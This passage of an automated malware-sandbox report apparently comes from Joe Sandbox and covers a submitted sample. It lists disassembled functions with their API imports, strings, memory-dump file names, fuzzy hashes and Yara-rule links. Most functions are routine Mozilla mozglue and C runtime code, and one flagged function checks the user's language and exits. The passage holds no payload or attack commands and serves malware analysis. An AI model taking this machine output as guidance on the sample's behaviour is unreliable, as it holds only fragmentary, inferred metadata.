                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c1ead24e0fbe7ed0fd6519ad3422a38af6a8d777d4cfd3c39c69cb08cf8cfee
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b16a77972cfc94c6aae75c994df6a28742b7824e567fd348577d68d48020b852
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c1ead24e0fbe7ed0fd6519ad3422a38af6a8d777d4cfd3c39c69cb08cf8cfee
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351BF71D05305CBDB00EF69CC806AEF7B1EF49318F45892DD8556B740EB70B9488BAA
                                                                                                                                                                                                                                                                                                                                  Function 6C64A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C64A565
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C64A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64A4BE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C64A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C64A4D6
                                                                                                                                                                                                                                                                                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C64A65B
                                                                                                                                                                                                                                                                                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C64A6B6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: 0$z
                                                                                                                                                                                                                                                                                                                                  • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c3921916b56788db1bf5e0d8df5e33da266daa9e62dc192df2b27fe188fde355
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 24cbc72bd3d5390b5212edcceff619912e7f5c7f65775dc0a55415a0ae2abf42
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3921916b56788db1bf5e0d8df5e33da266daa9e62dc192df2b27fe188fde355
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8413771908745AFC341DF28C480A8FBBE5BF8A354F50CA2EF49987651EB30E549CB86
                                                                                                                                                                                                                                                                                                                                  Function 6C619420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: EnterCriticalSection.KERNEL32(6C65E370,?,?,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB94
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60ABD1
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C61946B
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C619459
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C61947D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 053abd58d5580ae8042e636ee053eb9b44cd2b358935aec1a55b0456c535681f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c007017edff905cf0b2949cc2b812e04e40c196ad86ae241fd1f0955dd370340
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 053abd58d5580ae8042e636ee053eb9b44cd2b358935aec1a55b0456c535681f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301D870B041018BD700DB5FDD51A9A33759F0A32EF644536DD0BC6F52D722D465895F
                                                                                                                                                                                                                                                                                                                                  Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                                                                                                                                  • String ID: *
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1494266314-163128923
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                                                                                                                                                                                                                                                                                                                  Function 6C5DB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB6AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB6D1
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB6E3
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB70B
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB71D
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C5DB61E), ref: 6C5DB73F
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB760
                                                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C5DB61E,?,?,?,?,?,00000000), ref: 6C5DB79A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1394714614-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d3143ad546097b6b7f0224d05b166680fdf5310aace739ae972ca6783f6ea42
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f973d5a1bf15b3c4ea8f3b830fa7fd625e232a04d1dea47779d48892fb9e9a0c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3143ad546097b6b7f0224d05b166680fdf5310aace739ae972ca6783f6ea42
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8641B5B2D002159FCB04DF6CDC805AEB7B6BB85324F264669E825E7780E731ED0487D9
                                                                                                                                                                                                                                                                                                                                  Function 6C64B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C64B5B9
                                                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C64B5C5
                                                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C64B5DA
                                                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C64B5F4
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C64B605
                                                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C64B61F
                                                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C64B631
                                                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64B655
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3ed06060b659364213876274a287afdab5956058ed56047761a6dc249554f70e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b3bf56f88296c04a18f5d9e09ee32895035bbe960e667af5f5d7442c650ec561
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed06060b659364213876274a287afdab5956058ed56047761a6dc249554f70e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29317471B001048BCF04EF6AC8985AEB7F5FBC6324F644655D94697780DB71A806CF9E
                                                                                                                                                                                                                                                                                                                                  Function 6C616590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60FA80: GetCurrentThreadId.KERNEL32 ref: 6C60FA8D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60FA80: AcquireSRWLockExclusive.KERNEL32(6C65F448), ref: 6C60FA99
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C616727
                                                                                                                                                                                                                                                                                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6167C8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C624290: memcpy.VCRUNTIME140(?,?,6C632003,6C630AD9,?,6C630AD9,00000000,?,6C630AD9,?,00000004,?,6C631A62,?,6C632003,?), ref: 6C6242C4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: data$vel
                                                                                                                                                                                                                                                                                                                                  • API String ID: 511789754-235608994
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e449f2bb597fdb18dfdc715646ff949e7f981c1deb10b6cf73e9d774dcda3241
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2952a0a1c09cdf61be258c86701e719cc1201f4f273b862ec1979ac7733a104
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e449f2bb597fdb18dfdc715646ff949e7f981c1deb10b6cf73e9d774dcda3241
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4D1BF75A083408BD724DF29C840B9BB7E5EFC5308F10892DD58987B91EB71E809CB5A
                                                                                                                                                                                                                                                                                                                                  Function 6C60D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C5DEB57,?,?,?,?,?,?,?,?,?), ref: 6C60D652
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5DEB57,?), ref: 6C60D660
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5DEB57,?), ref: 6C60D673
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C60D888
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID: W]l$|Enabled
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4142949111-2942830398
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0069ee711264cc39f642ba5d88742f9ff891cd9de472701a5711e8be2f3512a3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 99872a2bbca111863dc3e694a459c73417c5726c162ecd48cad435c695c3d7ee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0069ee711264cc39f642ba5d88742f9ff891cd9de472701a5711e8be2f3512a3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90A1F2B0B003049FDB19CF69C9D07AEBBF1AF49318F58815CD885AB741D735A845CBA9
                                                                                                                                                                                                                                                                                                                                  Function 6C621D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C621D0F
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C621BE3,?,?,6C621D96,00000000), ref: 6C621D18
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C621BE3,?,?,6C621D96,00000000), ref: 6C621D4C
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C621DB7
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C621DC0
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C621DDA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C621EF0: GetCurrentThreadId.KERNEL32 ref: 6C621F03
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C621EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C621DF2,00000000,00000000), ref: 6C621F0C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C621EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C621F20
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C621DF4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bff29665ea3e34d96730090efd07c9ad7184695756d00e47904eae99af36cb3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 32d6001d44c943ab30f3fa0f92ef8f8e4a3e5ca717e45d1ff8b6c4be8af5a4da
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bff29665ea3e34d96730090efd07c9ad7184695756d00e47904eae99af36cb3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E4179B52047019FCB14CF29C488A56BBF9FB89354F60442DE99A87B41CB35F854CB99
                                                                                                                                                                                                                                                                                                                                  Function 6C6184E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6184F3
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C61850A
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C61851E
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C61855B
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C61856F
                                                                                                                                                                                                                                                                                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6185AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C61767F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C617693
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6176A7
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6185B2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5F5EDB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: memset.VCRUNTIME140(ewcl,000000E5,?), ref: 6C5F5F27
